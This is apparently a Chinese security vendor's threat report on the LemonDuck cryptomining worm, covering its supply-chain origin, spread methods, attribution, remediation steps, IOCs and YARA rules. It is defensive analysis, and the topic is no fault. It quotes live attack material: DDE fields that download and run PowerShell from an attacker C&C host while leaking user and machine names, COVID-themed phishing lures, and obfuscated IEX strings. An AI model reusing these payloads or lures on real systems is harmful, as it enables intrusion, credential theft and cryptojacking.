起底“APT”挖矿组织——“小黄鸭”LemonDuck(1)

摘要

近期，我们监测到多起利用钓鱼邮件、漏洞利用传播，进行加密数字货币挖掘的蠕虫攻击活动。

经研究人员分析后将这一系列攻击活动定义为商业化APT行为，我们将这一系列活动背后的组织命名为“小黄鸭”。（关于命名由来，后文专门提及）

不同于以往发现的同类型攻击，该攻击活动具有以下特征：

• 起源于针对“驱动人生”供应链的APT攻击；

• 持续时间长，从2018年12月份起持续至今；

• 影响范围广泛，波及全球，已有数百万设备被感染；

• 传播途径多样，通过漏洞利用、Outlook邮件、移动存储设备进行传播；

• 利用新冠疫情对邮件攻击模块做针对性升级，以提高感染效率；

• 频繁利用开源项目及新披露漏洞的POC来增强蠕虫感染能力；

• 多样性，迭代/升级的频率远超以往发现的同类型威胁攻击。

与以往大部分APT攻击活动目的为窃取敏感资料、破坏关键设施等不同，“小黄鸭”攻击似乎仅以经济利益为目的：

通过控制计算机、侵占计算资用于加密数字货币的挖掘。

“小黄鸭”最初由针对“驱动人生”发起的APT攻击演变而来，但研究后发现，攻击者可能只是希望利用“驱动人生”作为跳板，使蠕虫尽可能广泛地传播。

攻击者疑似为具有一定专业能力的境外组织，发起或参与过大规模网络攻击相关活动（如构建僵尸网络等）。

至今“小黄鸭”已发展成面向全球，主要针对运行Windows系统的终端设备的有组织、有计划的、以挖矿为目的高级长期威胁组织。

当前在国内仍发现大量个人PC及多家知名企业被感染的情况。

其感染目标已不限于Windows主机，还有一部分运行嵌入式Windows 7系统的IoT设备同样受到波及，智能电视，智能扫描仪，工业AGV等，并在近期新增了针对Linux设备的攻击模块。

受到感染的机器中绝大部分来自于政府与企业。

值得注意的是，“小黄鸭”发动的攻击中上传了十分详尽的系统环境信息，这或为其筛选“特定目标”进行下一步定向攻击而做好了准备。

这意味着，“驱动人生”遭受定向攻击同类事件或将重演……

通过对相关情报的关联分析后发现：

国内外多家安全厂商所述的“永恒之蓝”下载器，蓝茶，MTLminer，“驱动⼈⽣”⽆⽂件挖矿，Beapy，LemonDuck，柠檬鸭相关攻击活动，均为“小黄鸭”所为。

简要分析

以下是“小黄鸭”整个的攻击链路图：

不同于常规的攻击链路，其攻击链路中：

具有大量的远程恶意文件执行操作，且相互之间具有递归/嵌套执行的特点。

其恶意脚本经过了相当复杂的加密和混淆（这帮助其规避绝大部分的引擎查杀）。

其远程脚本名伪装成一些普通的前端页面后缀（如：PHP，JS，JSP，JSON，PNG...）

不同的感染路径会触发请求不同名称的远程脚本，这起到一个Monitor的作用。

存在多个命名不同的攻击脚本，但其内容完全一致的情况。

其攻击链主要通过计划任务，实现在系统中的更新与持久化：

通过创建随机命名的定时任务，每小时从C&C服务器获取代码并执行，来触发远程代码中写入的挖矿与传播操作。

这种计划任务配合远程文件加载执行的方式，使得更新后的远程恶意脚本会在已感染机器再次执行。

攻击者一直在根据攻击链路中反馈给C&C服务器的信息（有关用户帐户，环境信息，权限以及恶意负载执行状况的详细信息），不断地对环节及流程进行调整和优化。

在近两月的监测周期中，已经捕获到数十次攻击链的更新。

其主要传播途径可分为三类：

• 通过漏洞利用传播：

• 端口扫描

• EternalBlue/MS17-010 针对Win7/Win8

• CVE-2020-0796 （2020年4月新增）

• 暴力破解（除自身携带字典外，还会将获取本地口令/凭证加入字典）

• $IPC

• SMB

• MS-SQL

• RDP

• NTLM

• WMI

• SSH（2020-06-01新增，针对Linux root账号）

• <

• 利用移动存储设备传播 （CVE-2017-8464）：

• 通过将恶意DLL与快捷方式（LNK）文件一起植入文件夹中，从而感染可移动USB驱动器和网络驱动器。

  当在会解析.lnk快捷方式文件的任何应用程序中打开驱动器时，快捷方式将执行恶意的DLL组件。

• 利用Outlook邮件传播/社会工程学传播：

• 借助新冠疫情，新增部分与新冠有关邮件主题

• 随机选取邮件主题及内容，发送给感染主机上的所有Outlook联系人

• 生成恶意文档（CVE-2017-8570，DDE），恶意JS文件

其先前利用Outlook进行的传播过程中，捕获的样本中邮件主题是唯一的，直接硬编码在脚本中：

$mail_subject="The Truth of COVID-19 ????????????"
$mail_body="Virus actually comes from United States of America"

而近期一次更新中：

其在利用邮件传播的攻击模块中包含了以下多个邮件主题，随机挑选其中之一（其中已经新增了两个与新冠有关的主题）：

$global:mail_pools=@(
# 与新冠关
("The Truth of COVID-19","Virus actually comes from United States of America"),
("COVID-19 nCov Special info WHO","very important infomation for Covid-19see attached document for your action and discretion."),
("HALTH ADVISORY:CORONA VIRUS","the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion."),
("WTF","what's wrong with you?are you out of your mind!!!!!"),
("What the fcuk","are you out of your mind!!!!!what 's wrong with you?"),
("good bye","good bye, keep in touch"),
("farewell letter","good bye, keep in touch"),
("broken file","can you help me to fix the file,i can't read it"),
("This is your order?","file is brokened, i can't open it")
)

恶意RTF文档打开后的截图，如下所示：

攻击起源

“小黄鸭”最早的攻击活动可追溯到2018年11月的一起针对性攻击事件：

2018年11月12日 10:53分：

驱动人生的一台运维跳板机出现异常远程登录……（推测应该是之前被僵尸网络感染，而后被针对性持续渗透）

11月15日 17:17分：

攻击者通过多层内网渗透，成功获取升级服务器（103.56.77.23 , globalupdate.updrv.com）口令并登录。

12月 2日至5日：

用于攻击的域名被注册：

haqo.net  2018-12-02T14:35:52Z 
abbny.com 2018-12-03T04:06:07Z 
ackng.com 2018-12-05T06:58:03Z 

注册时间段大概是北京时间12点-22点，来自于三个不用的域名供应商。

我们监测到的远程脚本的更新时间范围为10点-20点，这两点表明了攻击者的活动时间范围。

12月14日 14:15分：

攻击者利用代理 84.39.112.58（📍瑞士）远程登录到升级服务器 103.56.77.23

备份并修改 ServerConfig.xml文件，登录SQL数据库后插入其准备好的恶意下载链接

随后于当天约18:00删除

借此，短短不到4个小时的时间内，多达数十万台PC受到感染。

按照当时的Meno币价格每10万台僵尸主机，预计每月会为攻击者带来近千美元的收益

值得注意的是，此次攻击显然不是有备而来。

在成功入侵驱动人生升级服务器后，攻击者在受害者内网潜伏了近一个月的时间。

而后才注册相关域名，为“攻击测试”做准备，且在攻击生效后立即恢复了服务器相关设置。

以上行为似乎表露了此次攻击并非有备而来，攻击者当时并未准备好此次大规模蠕虫攻击。

也许是在这次“测试攻击”中，获取了不菲的收益：

攻击者在2018年12月19日，更新恶意程序：新增powershell后门，以做权限维持，及方便后续更新。

此后“小黄鸭”变得一发不可收拾，其攻击活动在本报告截止（2020-06-13）时仍十分活跃，期间已经历了数百次的更新升级（国内外已有多达数十篇与其相关的报告……）

以下是我们近期监测到的“小黄鸭”攻击链部分变动更新状况：

近期变动

2020-04-27:

邮件中包含的RTF文档更新了DDE链接，DDE加载对象由远程文件变为本地文件，这帮助其成功规避掉部分沙箱 检测规则。

DDE链接对比如下：

 Opening file: readme.doc
 DDE Links:
 DDEAUTO      "     C:\Programs\Microsoft\Office    \ 12    \ MSWord\..\..\..\..\..\Windows\system32\cmd.exe /c      powershell [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:%tmp%wxJadS9Xyg.sct').Exec(0)&"      "Microsoft Office Remote  Database"
 Opening file: urgent.doc
 DDE Links:
 DDEAUTO      "     C:\Programs\Microsoft\Office    \ 12    \ MSWord\..\..\..\..\..\Windows\system32\cmd.exe /c      powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.awcna.com/mail.jsp?dde*%username%*%computername%')&"      "Microsoft Office Remote  Database"

2020-05-19 :

C&C域名 tr2q.com停止解析 ，新增 zer9g.com

仍可通过IP: 66.42.43.37访问，由于Hosts文件修改，不会对已经感染的机器产生影响

2020-05-21：

远程脚本全线更新，Base64编码加密替换为MemoryStream，文件体积变大，分析难度提高，查杀率降低。

更新前：

更新后：

2020-06-01:

主要攻击模块 if.bin中新增了对于Linux SSH爆破功能

通过使用PuTTY link工具，即 plink.exe对局域网内22端口进行root账号字典爆。

若SSH爆破成功后，会在目录： /.Xll/xr写入挖矿程序，并加入crontab定时执行 。

溯源分析

在针对样本中涉及的域名及其解析IP的关联分析中发现：

攻击者对于域名与服务器供应商选择的离散度很高，这增加接管及关停其黑色资产的难度，为攻击活动提供缓冲期，便于其切换和迁移黑色资产。

图中标红的域名为首次测试攻击所使用，且ackng.com一直沿用至今。

其近期活动中偏好的域名注册商为：https://www.epik.com

在样本监测中我们发现：

短时间内多次对同一脚本发起请求，得到同MD5文件但其修改时间具有微小的时间差，

其C&C服务器的背后可能使用了负载均衡相关的机制来保障C&C的正常服务。

我们注意到历史上“小黄鸭”使用的某些C&C域名关联子域名的解析IP:

js.haqo.net 81.177.135.35

与暗云III v3.0 、Mykings、Mirai、Smominru僵尸网络相关活动有关联。

经过调查发现：

初期“小黄鸭”的攻击模式与Mykings具有一定相似性，这表明“小黄鸭”的攻击模式或受其启发。

而后“小黄鸭”故意了创建部分子域名，将其解析在与Mykings的资产相关联IP地址上，从而混淆安全分析的调查方向。

这部分解析在Mykings IP上的子域名无法像其他子域名一样提供正常的C&C服务

我们调查了该组织在初期攻击时使用的各类资产，想从中找出与该攻击活动有关的其他攻击活动：

# domain
abbny.com
haqo.net
ackng.com #(该域名沿用至今）
# C&C
45.118.132.44
172.105.237.31
27.102.113.141
# 矿池
172.105.204.237
# Proxy
84.39.112.58
95.211.168.228

遗憾的是，攻击者所用资产几乎全部是第一次启用，且供应商各不相同，这使得我们没有取得任何有价值的发现。

通过追溯其不同时期攻击链的变动，我们发现：

各安全厂商所报“永恒之蓝”下载器，蓝茶，MTLminer，“驱动人生”无文件挖矿，Beapy，LemonDuck，柠檬鸭相关攻击活动均为“小黄鸭”所为。

该团伙具备较高的安全水平及快速学习的能力，在首次攻击前应参与或了解过大面积网络攻击相关活动（如：构建僵尸网络）。

更甚者，存在由从事网络安全相关工作的人员，以谋求经济利益为目的，在某些便利环境的诱使下，利用相关行业经验发起的网络攻击的可能。

分析其攻击特征（如爆破字典，社会工程学相关内容），我们注意到：

其攻击链路变动中针对英语语种的网络环境的优化居多，且没有出现针对中国的网络环境作出相应优化，

虽然“小黄鸭”初期在中国爆发，而且攻击成效显著。

但并没有后续并未针对中国的网络环境作出优化（这对于该能力水准的攻击者来说几乎没有门槛）。

这违背了“小黄鸭”攻击活动中所表露的：单纯只为侵占大量计算资源⽤于加密货币挖掘的经济目标。

结合以下历史监测信息来看，攻击不是呈现合理的蔓延趋势，疑似越过非英语国家，直奔欧美……

Symantec在2019年4月的分析：

80％以上的受害者位于中国，其他受害者位于韩国，日本和越南。

而到2019年10月，据Sophos的披露：

中国受害者的占比降至24%，新加坡17%，英国达到6%，美国3%，而之前较多的韩日这次占比还在其后。

这使得攻击者具有两种可能：

• 境内攻击者，后期有意避开境内环境

• 英语母语攻击者，对英语语种以外的网络环境不熟悉

通过行为/恶意资产/代码风格及命名倾向特征推测其应为使用英语语种的攻击者，所以我们更倾向于第二种可能。

关于命名：为啥叫小黄鸭？

在分析中发现：

C&C请求头的唯一出现的Header配置User-Agent使用了比较有意思的前缀 Lemon-Duck：

$Lemon_Duck='MTXDaxuqWPoOkQu'; #历史版本出现过的变量赋值
$Lemon_Duck=''; #近期攻击中的赋值
$webclient.Headers.add("User-Agent","Lemon-Duck-"+$Lemon_Duck.replace('','-'))
# User-Agent: Lemon-Duck--

测试中发现User-Agent中值的变化都对于返回的结果无影响（此变量应只是一种信息反馈的字段）。

而创建的计划任务中追踪到几个比较有意思的固定命名，分别在以下不同时期中出现：

"Ddrivers" 2018年12月

"MicrosoftwindowsBluetooths" 2018年12月

"Rtsa" 2019年09月

"bluetool" 2019年11月

"Rtsa1"/"Rtsa2" 2020年2月

"bluetea" 2020年4月

# mail.jsp
# report.jsp
# a.sjp
$stsrv.GetFolder("").GetTask("bluetea")

有些报告里将其命名为“蓝茶行动”

在后续中命名变更为“blackball” 2020年5月

# mail.jsp
# report.jsp
# a.jsp
$stsrv.GetFolder("").GetTask("blackball")

照这种规范，此次应该叫“黑球”，或者“黑丸”还好听点？（有厂家在6月3日的报告中，将其命名为“黑球行动”……）

所以用Lemon-Duck更具有代表性一些：

”Lemon-Duck“意译为中文应为：“小黄鸭”

尝试挖掘下特征变量名背后的意义：

bluetea：

蝶豆花（Butterfly Pea Tea）也称为蓝花蝶、蓝花豆、蝴蝶花豆等名称，而北美人通常称蝶豆花茶为Blue Matcha 或Blue Chai, 也有人直接称之为Blue Tea。

blackball：

“黑丸”？

发现台湾有家奶茶连锁叫作blackball，珍珠奶茶里的珍珠？

有点受到启示：

这两种玩意都可以作为奶茶的原料，难道说此攻击源自与奶茶🥛爱好者？

检测方案

• 可根据后续列出的IOCs信息对相关主机进行排查；

• 查看相关主机CPU是否运行有异常，比如CPU占用过高；

• 查看内网主机及相关端口如445、1433、3389、65529、65533等端口是否开启且有过被扫描或暴力破解行为；

• 检测相关主机是否存在CVE-2017-8570及MS17-010高危漏洞；

• 追查同样本邮件相关的邮箱地址，在其接收邮件主机同网域内进行全面检测扫描；

修复建议

使用管理员权限打开Poweshell输入以下命令：

去除已写入的网络规则：

netsh advfirewall firewall delete rule name="SDNSd"
netsh advfirewall firewall delete rule name="DNSd"
netsh interface portproxy delete v4tov4 listenport=65529
netsh interface portproxy delete v4tov4 listenport=65533
# 如果需要提供SMB服务则不用执行以下命令
netsh advfirewall firewall delete rule name="deny445"
netsh advfirewall firewall delete rule name="deny445"

查看定时任务：

function Get-AllTaskSubFolders {
    [cmdletbinding()]
    param (
        $FolderRef = $Schedule.getfolder("")
    )
    if ($FolderRef.Path -eq '') {
        $FolderRef
    }
    if (-not $RootFolder) {
        $ArrFolders = @()
        if(($folders = $folderRef.getfolders(1))) {
            $folders | ForEach-Object {
                $ArrFolders += $_
                if($_.getfolders(1)) {
                    Get-AllTaskSubFolders -FolderRef $_
                }
            }
        }
        $ArrFolders
    }
}
$Schedule = New-Object ComObject ("Schedule.Service");
$Schedule.connect($env:COMPUTERNAME);
foreach ($Folder in Get-AllTaskSubFolders) {
    if (($Tasks = $Folder.GetTasks(1))) {
        $Tasks | Foreach-Object {
            if (($_.State -gt 1)) {
                New-Object -TypeName PSCustomObject -Property @{
                            'Name' = $_.name
                            'State' = switch ($_.State) {
                                0 {'Unknown'}
                                1 {'Disabled'}
                                2 {'Queued'}
                                3 {'Ready'}
                                4 {'Running'}
                                Default {'Unknown'}
                            }
                            'Path' = $_.path
                }
            }
        }
    }
}

查看是否具有明显随机的任务名，然后根据路径删除：

schtasks /delete /tn PATH /F

• 如发现中招主机，应立即切断网络，关闭445端口服务，进行全面查杀；

• 对CVE-2017-8570，MS17-010，CVE-2020-0796相关漏洞及时打补丁：

• CVE-2017-8570补丁信息参考：https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8570;

• MS17-010补丁信息参考：https://support.microsoft.com/zh-cn/help/4012598/title

• CVE-2020-0796信息参考：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

防范建议

• 停止使用Win7（20201月14日后微软已停止对其维护）

• 及时对内网主机打补丁；

• 加强系统安全性。身份验证和加密机制有助于防止对目标系统进行未经授权的修改，使用高强度密码，并定期更新，不要使用弱口令；

• 多台设备不要使用相同密码，蠕虫会抓取本机密码，攻击局域网中的其它机器；

• 关闭主机不必要的端口（如445，65529等），并使用严格的权限控制；

• 部署其他安全机制，例如行为监视，以检测并防止异常例程或未授权程序或脚本的运行。企业内IDS/IPS防护设备根据后续列出的Yara检测规则进行更新；

• 禁用PowerShell，因为普通用户和非技术用户都不需要：

  使用管理员权限打开Powershell，输入以下命令，然后回车

1. Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root

• 阻止从Office文档中嵌入或链接的COM对象，请执行以下步骤：

1. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftOfficeCommonCOM Compatibility{F20DA720-C02F-11CE-927B-0800095AE340}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

2. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftOfficeCommonCOM Compatibility{F20DA720-C02F-11CE-927B-0800095AE340}" /v "ActivationFilterOverride" /t REG_DWORD /d 0x1

4. reg add "HKEY_LOCAL_MACHINESOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{F20DA720-C02F-11CE-927B-0800095AE340}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

5. reg add "HKEY_LOCAL_MACHINESOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{F20DA720-C02F-11CE-927B-0800095AE340}" /v "ActivationFilterOverride" /t REG_DWORD /d 0x1

• 禁用SMB的压缩功能：

1. Set-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetServicesLanmanServerParameters" DisableCompression -Type DWORD -Value 1 -Force

IOCs

以下是有关该APT活动的相关IoCs:

Domain：

C&C:

abbny.com
p.abbny.com
info.abbny.com
haqo.net
i.haqo.net
info.haqo.net
beahh.com
v.beahh.com
w.beahh.com
p.beahh.com
d.beahh.com
oom.beahh.com
info.beahh.com
minicen.ga
img.minicen.ga
t.minicen.ga
y6h.net
v.y6h.net
zer2.com
lpp.zer2.com
t.zer2.com
awcna.com   (2020-04-21停止解析)
t.awcna.com
tr2q.com
t.tr2q.com  (2020-05-20停止解析)
amynx.com   (未启用)
t.amynx.com (未启用) （2020-05-26发现启用）
zer9g.com
t.zer9g.com  (2020-05-21新增,取代t.tr2q.com)
zz3r0.com    
t.zz3r0.com  (2020-05-25新增,取代t.awcna.com）)
jdjdcjq.top
t.jdjdcjq.top (2020-06-01新增，用于Linux)

Miner Pools & Payload Server：

# 矿池地址
lpp.zer2.com
lp.haqo.net
lpp.awcna.com
lplp.haqo.net
lplp.beahh.com
lplp.abbny.com
lplp.ackng.com
p.k3qh4.com
p.b69kq.com
# Payload存放
d.ackng.com 
info.ackng.com
down.ackng.com
haqo.net
dl.haqo.net

IP:

66.42.43.37
172.104.7.85
207.154.225.82
128.199.183.160
206.189.144.115
138.68.30.50
128.199.64.236
161.35.107.193
167.71.87.85
45.79.77.20
# proxy
84.39.112.58
95.211.168.228

MD5:

由于

98bf04d3d6e25c0cac4ac6af604bcdbf 
779c89b9404bdd69547c28885167f131
d0b03daf3c84987768bd4ce8e2a77548
51f6eba99e2b33e5458d78e41a130fe2
db50d9392ea9dd0efceb2364f0e2f187
5d4d94ee7e06bbb0af9584119797b23a
f3b25701fe362ec84616a93a45ce9998
df5c8f7677a3361d17cc1ba820436ce9

Ports:

43668
65529
65533

File:

# Windows
$env:tmpGkwiGedjuq8391j.txt
$env:tmpGkPiGedjuq8f91j.txt
$env:tmpgodmali3.txt
$env:tmpkk4kk.log
$env:tmpnvdg.dat
$env:temptt.vbs
# Linux 
/.Xll/xr
# Driver
DRIVE:UTFsync\inf_data

Yara:

CVE-2017-8570攻击文件 YARA检测规则：

rule rtf_composite_moniker {
   meta:
      ref = "https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html"
   strings:
      $header_rtf = "{\rt" nocase
      $composite_moniker = "0903000000000000C000000000000046" nocase
      $new_moniker = "C6AFABEC197FD211978E0000F8757E2A" nocase
   condition:
      $header_rtf at 0 and $composite_moniker and $new_moniker
}

DDE 文件 YARA检测规则：

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
rule Office_DDEAUTO_field {
  strings:
    $a = /<w:fldChars+?w:fldCharType="begin"/>.+?b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]b.+?<w:fldChars+?w:fldCharType="end"/>/
  condition:
    $a
}
rule Office_DDE_field {
  strings:
    $a = /<w:fldChars+?w:fldCharType="begin"/>.+?b[Dd][Dd][Ee]b.+?<w:fldChars+?w:fldCharType="end"/>/
  condition:
    $a
}
rule Office_OLE_DDEAUTO {
  strings:
    $a = /x13s*DDEAUTOb[^x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
rule Office_OLE_DDE {
  strings:
    $a = /x13s*DDEb[^x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}

Mimikatz YARA检测规则：

rule mimikatz
{
    meta:
        description     = "mimikatz"
        author          = "Benjamin DELPY (gentilkiwi)"
        tool_author     = "Benjamin DELPY (gentilkiwi)"
    strings:
        $exe_x86_1     = { 89 71 04 89 [0-3] 30 8d 04 bd }
        $exe_x86_2     = { 8b 4d e? 8b 45 f4 89 75 e? 89 01 85 ff 74 }
        $exe_x64_1     = { 33 ff 4? 89 37 4? 8b f3 45 85 c? 74}
        $exe_x64_2     = { 4c 8b df 49 [0-3] c1 e3 04 48 [0-3] 8b cb 4c 03 [0-3] d8 }
        $dll_1         = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
        $dll_2         = { c7 0? 10 02 00 00 ?? 89 4? }
        $sys_x86       = { a0 00 00 00 24 02 00 00 40 00 00 00 [0-4] b8 00 00 00 6c 02 00 00 40 00 00 00 }
        $sys_x64       = { 88 01 00 00 3c 04 00 00 40 00 00 00 [0-4] e8 02 00 00 f8 02 00 00 40 00 00 00 }
    condition:
        (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
}

PUBLIC KEY：

攻击者使用用来验证C&C服务器返回内容的RSA公钥：

-----BEGIN RSA PUBLIC KEY-----
2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0 M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=
-----BEGIN RSA PUBLIC KEY-----

其使用的IEX (invoke-expression) 混淆:

# mail.jsp
( $SHEllid[1]+$sHELlID[13]+'X')
( $EnV:cOmSpeC[4,15,25]-JoiN'')
## 2020-05-21
( $VErboseprEFereNCe.TOstRING()[1,3]+'X'-joIN'')
# x.jsp
( $sHEllid[1]+$ShELlID[13]+'x')
( ([StrINg]$vERbosepRefEreNcE)[1,3]+'X'-jOIN'') 
$sHeLlID[1]+$ShELLID[13]+'X'
# if.bin
( $SHElLid[1]+$sHElLID[13]+'X')
$PSHOME[4]+$pSHoMe[30]+'x'
( $pSHoMe[21]+$PShoME[30]+'x')
# report.jsp
((varIABlE '*mDR*').NAME[3,11,2]-jOin'')
((Gv '*mdR*').nAme[3,11,2]-joiN'')
# a.jspmail
(([strINg]$VErBoSeprEFErenCE)[1,3]+'x'-Join'')
( $ShelLId[1]+$sHelliD[13]+'x') 
( $enV:comSPec[4,15,25]-jOin'')
## 2020-05-21
( $pSHOMe[21]+$pSHome[34]+'X')
# if_main.bin
( $VerbOsepReFeRencE.TOsTring()[1,3]+'x'-jOin'')
((vArIaBLe '*MDr*').Name[3,11,2]-JoiN'')
( $Env:comSPEc[4,15,25]-JoIN'') 
# 7p.php
( $ShelLiD[1]+$SHellid[13]+'X')
( $pShOmE[4]+$PsHomE[34]+'X')
# rdp.jsp
( $VErboseprEFereNCe.TOstRING()[1,3]+'X'-joIN'')
( $PShOME[4]+$pShOmE[34]+'X')
( $Env:comsPeC[4,26,25]-jOin'')
# ipc.ps1
((VaRiaBlE '*MDr*').NAme[3,11,2]-jOIN'')
( $VeRboseprefERENcE.toSTRiNg()[1,3]+'X'-JOIn'')